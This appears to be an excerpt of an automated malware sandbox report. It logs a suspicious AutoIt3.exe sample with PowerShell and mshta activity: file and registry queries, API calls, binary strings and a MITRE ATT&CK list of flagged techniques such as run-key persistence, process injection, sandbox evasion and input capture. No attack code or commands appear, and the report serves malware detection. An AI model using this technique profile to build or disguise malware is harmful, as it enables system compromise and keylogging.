      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001E8C58 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001B59C7 GetUserNameW
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001AB99F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_0018310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: AutoIt3.exe | Binary or memory string: WIN_81
Source: AutoIt3.exe | Binary or memory string: WIN_XP
Source: AutoIt3.exe | Binary or memory string: WIN_XPe
Source: AutoIt3.exe | Binary or memory string: WIN_VISTA
Source: AutoIt3.exe | Binary or memory string: WIN_7
Source: AutoIt3.exe.7.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 15, 1USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: AutoIt3.exe | Binary or memory string: WIN_8
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001F23E0 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001F1DD8 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
MITRE ATT&CK Matrix

Techniques flagged by this analysis, grouped by tactic. The number in parentheses is the count badge shown next to the technique in the report's matrix; the unflagged technique names that fill the rest of the matrix are omitted here.

Reconnaissance: none
Resource Development: none
Initial Access: Valid Accounts (2)
Execution: Command and Scripting Interpreter (11), PowerShell (4), Native API (1)
Persistence: Registry Run Keys / Startup Folder (21), Valid Accounts (2), DLL Side-Loading (1), Create Account (1)
Privilege Escalation: Registry Run Keys / Startup Folder (21), Access Token Manipulation (21), Process Injection (12), Valid Accounts (2), DLL Side-Loading (1), Exploitation for Privilege Escalation (1)
Defense Evasion: Virtualization/Sandbox Evasion (31), Deobfuscate/Decode Files or Information (21), Masquerading (21), Access Token Manipulation (21), Process Injection (12), Obfuscated Files or Information (2), Valid Accounts (2), Disable or Modify Tools (1), Timestomp (1), DLL Side-Loading (1), Modify Registry (1)
Credential Access: Input Capture (21)
